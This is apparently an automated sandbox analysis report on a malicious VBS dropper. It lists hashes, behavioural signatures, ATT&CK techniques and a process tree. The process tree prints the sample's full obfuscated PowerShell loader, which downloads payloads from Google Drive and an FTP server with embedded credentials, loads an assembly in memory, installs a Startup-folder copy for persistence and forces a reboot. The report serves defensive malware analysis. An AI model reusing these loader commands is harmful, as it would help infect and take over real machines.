b5682f78db9fa635d820b9d33ee8e5dc4ec20766865335a927ec9d4b049b0c55

General

Target

bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs
Size

562KB
MD5

29234d373b3118d99da44ae211f227a5
SHA1

f084f4248be8e1e13e4c6ddf5388e7eafc4a6b4a
SHA256

bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3
SHA512

d434084bf1b635b527ac6b715a8a22202387699a522c759265f6e7f01e369cefeec62c87b582a2ad29711c7524af15c5d66b45cd038732cad44df3ab3e97c1f7
SSDEEP

1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFl:pP

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2740	powershell.exe
3004	powershell.exe
2928	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3004	powershell.exe
2928	powershell.exe
2948	powershell.exe
2740	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1364 wrote to memory of 3004	1364	WScript.exe	30
PID 1364 wrote to memory of 3004	1364	WScript.exe	30
PID 1364 wrote to memory of 3004	1364	WScript.exe	30
PID 3004 wrote to memory of 2928	3004	powershell.exe	32
PID 3004 wrote to memory of 2928	3004	powershell.exe	32
PID 3004 wrote to memory of 2928	3004	powershell.exe	32
PID 2928 wrote to memory of 2948	2928	powershell.exe	33
PID 2928 wrote to memory of 2948	2928	powershell.exe	33
PID 2928 wrote to memory of 2948	2928	powershell.exe	33
PID 2948 wrote to memory of 2724	2948	powershell.exe	34
PID 2948 wrote to memory of 2724	2948	powershell.exe	34
PID 2948 wrote to memory of 2724	2948	powershell.exe	34
PID 2928 wrote to memory of 2740	2928	powershell.exe	35
PID 2928 wrote to memory of 2740	2928	powershell.exe	35
PID 2928 wrote to memory of 2740	2928	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9уかбDsуかбKQуかбgуかбCkуかбIуかбуかбnуかбGUуかбdQByуかбHQуかбJwуかбgуかбCwуかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかбgуかбCwуかбIуかбуかбnуかбGgуかбdуかбB0уかбHуかбуかбcwуかб6уかбC8уかбLwBlуかбHYуかбaQByуかбHQуかбdQBhуかбGwуかбcwBlуかбHIуかбdgBpуかбGMуかбZQBzуかбHIуかбZQB2уかбGkуかбZQB3уかбHMуかбLgBjуかбG8уかбbQуかбvуかбHcуかбcуかбуかбtуかбGkуかбbgBjуかбGwуかбdQBkуかбGUуかбcwуかбvуかбGoуかбcwуかбvуかбGkуかбbgBnуかбC4уかбdуかбB4уかбHQуかбJwуかбgуかбCgуかбIуかбBdуかбF0уかбWwB0уかбGMуかбZQBqуかбGIуかбbwBbуかбCуかбуかбLуかбуかбgуかбGwуかбbуかбB1уかбG4уかбJуかбуかбgуかбCgуかбZQBrуかбG8уかбdgBuуかбEkуかбLgуかбpуかбCуかбуかбJwBJуかбFYуかбRgByуかбHуかбуかбJwуかбgуかбCgуかбZуかбBvуかбGgуかбdуかбBlуかбE0уかбdуかбBlуかбEcуかбLgуかбpуかбCcуかбMQBzуかбHMуかбYQBsуかбEMуかбLgуかбzуかбHkуかбcgBhуかбHIуかбYgBpуかбEwуかбcwBzуかбGEуかбbуかбBDуかбCcуかбKуかбBlуかбHуかбуかбeQBUуかбHQуかбZQBHуかбC4уかбKQуかбgуかбFoуかбYwBCуかбGMуかбYQуかбkуかбCуかбуかбKуかбBkуかбGEуかбbwBMуかбC4уかбbgBpуかбGEуかбbQBvуかбEQуかбdуかбBuуかбGUуかбcgByуかбHUуかбQwуかб6уかбDoуかбXQBuуかбGkуかбYQBtуかбG8уかбRуかбBwуかбHуかбуかбQQуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбOwуかбpуかбCуかбуかбKQуかбgуかбCcуかбQQуかбnуかбCуかбуかбLуかбуかбgуかбCcуかбkyE6уかбJMhJwуかбgуかбCgуかбZQBjуかбGEуかбbуかбBwуかбGUуかбUgуかбuуかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбIуかбуかбoуかбGcуかбbgBpуかбHIуかбdуかбBTуかбDQуかбNgBlуかбHMуかбYQBCуかбG0уかбbwByуかбEYуかбOgуかб6уかбF0уかбdуかбByуかбGUуかбdgBuуかбG8уかбQwуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбWgBjуかбEIуかбYwBhуかбCQуかбIуかбBdуかбF0уかбWwBlуかбHQуかбeQBCуかбFsуかбOwуかбnуかбCUуかбSQBoуかбHEуかбUgBYуかбCUуかбJwуかбgуかбD0уかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかб7уかбCkуかбIуかбBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбCуかбуかбKуかбBnуかбG4уかбaQByуかбHQуかбUwBkуかбGEуかбbwBsуかбG4уかбdwBvуかбEQуかбLgBvуかбG0уかбcgBlуかбCQуかбIуかбуかб9уかбCуかбуかбZwBTуかбHoуかбQwBCуかбGwуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQB0уかбG4уかбZQBpуかбGwуかбQwBiуかбGUуかбVwуかбuуかбHQуかбZQBOуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбE8уかбLQB3уかбGUуかбTgуかбoуかбCуかбуかбPQуかбgуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбCkуかбKуかбBlуかбHMуかбbwBwуかбHMуかбaQBkуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQуかбgуかбCcуかбdуかбB4уかбHQуかбLgуかбxуかбDуかбуかбTуかбBMуかбEQуかбLwуかбxуかбDуかбуかбLwByуかбGUуかбdуかбBwуかбHkуかбcgBjуかбHуかбуかбVQуかбvуかбHIуかбYgуかбuуかбG0уかбbwBjуかбC4уかбdуかбBhуかбHIуかбYgB2уかбGsуかбYwBzуかбGUуかбZуかбуかбuуかбHуかбуかбdуかбBmуかбEуかбуかбMQB0уかбGEуかбcgBiуかбHYуかбawBjуかбHMуかбZQBkуかбC8уかбLwуかб6уかбHуかбуかбdуかбBmуかбCcуかбIуかбуかбoуかбGcуかбbgBpуかбHIуかбdуかбBTуかбGQуかбYQBvуかбGwуかбbgB3уかбG8уかбRуかбуかбuуかбG8уかбbQByуかбGUуかбJуかбуかбgуかбD0уかбIуかбBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбDsуかбKQуかбnуかбEуかбуかбQуかбBwуかбEoуかбOуかбуかб3уかбDUуかбMQуかбyуかбG8уかбcgBwуかбHIуかбZQBwуかбG8уかбbуかбBlуかбHYуかбZQBkуかбCcуかбLуかбуかбpуかбCkуかбOQуかб0уかбCwуかбNgуかбxуかбDEуかбLуかбуかб3уかбDkуかбLуかбуかб0уかбDEуかбMQуかбsуかбDgуかбOQуかбsуかбDgуかбMQуかбxуかбCwуかбNwуかбwуかбDEуかбLуかбуかб5уかбDkуかбLуかбуかб1уかбDEуかбMQуかбsуかбDEуかбMуかбуかбxуかбCwуかбMуかбуかбwуかбDEуかбKуかбBdуかбF0уかбWwByуかбGEуかбaуかбBjуかбFsуかбIуかбBuуかбGkуかбbwBqуかбC0уかбKуかбуかбoуかбGwуかбYQBpуかбHQуかбbgBlуかбGQуかбZQByуかбEMуかбawByуかбG8уかбdwB0уかбGUуかбTgуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбIуかбB0уかбGMуかбZQBqуかбGIуかбbwуかбtуかбHcуかбZQBuуかбCуかбуかбPQуかбgуかбHMуかбbуかбBhуかбGkуかбdуかбBuуかбGUуかбZуかбBlуかбHIуかбQwуかбuуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQB0уかбG4уかбZQBpуかбGwуかбQwBiуかбGUуかбVwуかбuуかбHQуかбZQBOуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбE8уかбLQB3уかбGUуかбTgуかбoуかбCуかбуかбPQуかбgуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбOwуかбyуかбDEуかбcwBsуかбFQуかбOgуかб6уかбF0уかбZQBwуかбHkуかбVуかбBsуかбG8уかбYwBvуかбHQуかбbwByуかбFуかбуかбeQB0уかбGkуかбcgB1уかбGMуかбZQBTуかбC4уかбdуかбBlуかбE4уかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбGwуかбbwBjуかбG8уかбdуかбBvуかбHIуかбUуかбB5уかбHQуかбaQByуかбHUуかбYwBlуかбFMуかбOgуかб6уかбF0уかбcgBlуかбGcуかбYQBuуかбGEуかбTQB0уかбG4уかбaQBvуかбFуかбуかбZQBjуかбGkуかбdgByуかбGUуかбUwуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかб7уかбH0уかбZQB1уかбHIуかбdуかбуかбkуかбHsуかбIуかбуかб9уかбCуかбуかбawBjуかбGEуかбYgBsуかбGwуかбYQBDуかбG4уかбbwBpуかбHQуかбYQBkуかбGkуかбbуかбBhуかбFYуかбZQB0уかбGEуかбYwBpуかбGYуかбaQB0уかбHIуかбZQBDуかбHIуかбZQB2уかбHIуかбZQBTуかбDoуかбOgBdуかбHIуかбZQBnуかбGEуかбbgBhуかбE0уかбdуかбBuуかбGkуかбbwBQуかбGUуかбYwBpуかбHYуかбcgBlуかбFMуかбLgB0уかбGUуかбTgуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбewуかбgуかбGUуかбcwBsуかбGUуかбfQуかбgуかбGYуかбLwуかбgуかбDуかбуかбIуかбB0уかбC8уかбIуかбByуかбC8уかбIуかбBlуかбHgуかбZQуかбuуかбG4уかбdwBvуかбGQуかбdуかбB1уかбGgуかбcwуかбgуかбDsуかбJwуかбwуかбDgуかбMQуかбgуかбHуかбуかбZQBlуかбGwуかбcwуかбnуかбCуかбуかбZуかбBuуかбGEуかбbQBtуかбG8уかбYwуかбtуかбCуかбуかбZQB4уかбGUуかбLgBsуかбGwуかбZQBoуかбHMуかбcgBlуかбHcуかбbwBwуかбDsуかбIуかбBlуかбGMуかбcgBvуかбGYуかбLQуかбgуかбCkуかбIуかбуかбnуかбHуかбуかбdQB0уかбHIуかбYQB0уかбFMуかбXуかбBzуかбG0уかбYQByуかбGcуかбbwByуかбFуかбуかбXуかбB1уかбG4уかбZQBNуかбCуかбуかбdуかбByуかбGEуかбdуかбBTуかбFwуかбcwB3уかбG8уかбZуかбBuуかбGkуかбVwBcуかбHQуかбZgBvуかбHMуかбbwByуかбGMуかбaQBNуかбFwуかбZwBuуかбGkуかбbQBhуかбG8уかбUgBcуかбGEуかбdуかбBhуかбEQуかбcуかбBwуかбEEуかбXуかбуかбnуかбCуかбуかбKwуかбgуかбFoуかбSwBuуかбFkуかбTQуかбkуかбCуかбуかбKуかбуかбgуかбG4уかбbwBpуかбHQуかбYQBuуかбGkуかбdуかбBzуかбGUуかбRуかбуかбtуかбCуかбуかбJwуかбlуかбEkуかбaуかбBxуかбFIуかбWуかбуかбlуかбCcуかбIуかбBtуかбGUуかбdуかбBJуかбC0уかбeQBwуかбG8уかбQwуかбgуかбDsуかбIуかбB0уかбHIуかбYQB0уかбHMуかбZQByуかбG8уかбbgуかбvуかбCуかбуかбdуかбBlуかбGkуかбdQBxуかбC8уかбIуかбBHуかбGMуかбVwBpуかбFIуかбIуかбBlуかбHgуかбZQуかбuуかбGEуかбcwB1уかбHcуかбIуかбBlуかбHgуかбZQуかбuуかбGwуかбbуかбBlуかбGgуかбcwByуかбGUуかбdwBvуかбHуかбуかбIуかбуかб7уかбCkуかбJwB1уかбHMуかбbQуかбuуかбG4уかбaQB3уかбHуかбуかбVQBcуかбCcуかбIуかбуかбrуかбCуかбуかбTgBKуかбFQуかбeуかбBEуかбCQуかбKуかбуかбgуかбD0уかбIуかбBHуかбGMуかбVwBpуかбFIуかбOwуかбpуかбCуかбуかбZQBtуかбGEуかбTgByуかбGUуかбcwBVуかбDoуかбOgBdуかбHQуかбbgBlуかбG0уかбbgBvуかбHIуかбaQB2уかбG4уかбRQBbуかбCуかбуかбKwуかбgуかбCcуかбXуかбBzуかбHIуかбZQBzуかбFUуかбXуかбуかб6уかбEMуかбJwуかбoуかбCуかбуかбPQуかбgуかбFoуかбSwBuуかбFkуかбTQуかбkуかбDsуかбKQуかбnуかбHUуかбcwBtуかбC4уかбbgBpуかбHcуかбcуかбBVуかбFwуかбJwуかбgуかбCsуかбIуかбBOуかбEoуかбVуかбB4уかбEQуかбJуかбуかбgуかбCwуかбQgBLуかбEwуかбUgBVуかбCQуかбKуかбBlуかбGwуかбaQBGуかбGQуかбYQBvуかбGwуかбbgB3уかбG8уかбRуかбуかбuуかбG4уかбSgB5уかбFYуかбagуかбkуかбDsуかбOуかбBGуかбFQуかбVQуかб6уかбDoуかбXQBnуかбG4уかбaQBkуかбG8уかбYwBuуかбEUуかбLgB0уかбHgуかбZQBUуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかбgуかбD0уかбIуかбBnуかбG4уかбaQBkуかбG8уかбYwBuуかбEUуかбLgBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбCkуかбdуかбBuуかбGUуかбaQBsуかбEMуかбYgBlуかбFcуかбLgB0уかбGUуかбTgуかбgуかбHQуかбYwBlуかбGoуかбYgBPуかбC0уかбdwBlуかбE4уかбKуかбуかбgуかбD0уかбIуかбBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбH0уかбOwуかбgуかбCkуかбJwB0уかбE8уかбTуかбBjуかбF8уかбSwBhуかбDMуかбWgBmуかбG8уかбWуかбуかбyуかбEoуかбSgByуかбFYуかбaуかбBtуかбFYуかбOQBjуかбG0уかбOQBYуかбHMуかбdQBYуかбG0уかбagуかбxуかбGcуかбMQуかбnуかбCуかбуかбKwуかбgуかбG8уかбeуかбBLуかбFUуかбZwуかбkуかбCgуかбIуかбуかб9уかбCуかбуかбbwB4уかбEsуかбVQBnуかбCQуかбewуかбgуかбGUуかбcwBsуかбGUуかбfQуかб7уかбCуかбуかбKQуかбnуかбDIуかбNуかбB1уかбFgуかбSgBUуかбHEуかбYQBtуかбGcуかбeQBNуかбHQуかбRgB6уかбGEуかбawBQуかбFIуかбMQBxуかбF8уかбSQB2уかбEcуかбaQBYуかбE4уかбZуかбBxуかбGEуかбTgуかбxуかбCcуかбIуかбуかбrуかбCуかбуかбbwB4уかбEsуかбVQBnуかбCQуかбKуかбуかбgуかбD0AIABvAHgASwBVAGcAJAB7ACAAKQAgAHUATgBDAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdQBOAEMAVgBxACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAG8AeABLAFUAZwAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAE4ASgBUAHgARAAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABOAEoAVAB4AEQAJAB7ACAAKQAgAFAAYgBuAEUAWgAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAFAAYgBuAEUAWgAkACAAOwA=';$kahlN = $qKKzc.replace('уかб' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs');powershell $vQpeD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$ermo = (New-Object Net.WebClient);$ermo.Encoding = [System.Text.Encoding]::UTF8;$ermo.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $ermo.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$ermo.dispose();$ermo = (New-Object Net.WebClient);$ermo.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $ermo.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.gni/sj/sedulcni-pw/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe RiWcG /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" RiWcG /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9c42af7d28eeffa1c11767eef7c9b2c6

SHA1
23f108bca5c73a62326e4f8d5f11f53b4eeeb12e

SHA256
9cbbb0b2d38abae81a7f3ef2f54dbcd425805b2b1971bd56ca9274750504e9d6

SHA512
2fd2d7e45318821c50a7136877f94819e7433f8c97b0c0f5aa4423af7e7a03edf011526e3a2f793a44da100302d44149c4ab84914e06675db0400fd5eac45177

Download Submit
memory/3004-11-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download
memory/3004-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download
memory/3004-9-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download
memory/3004-8-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download
memory/3004-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download
memory/3004-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/3004-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/3004-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

Filesize
4KB

Download
memory/3004-29-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

Filesize
4KB

Download
memory/3004-30-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing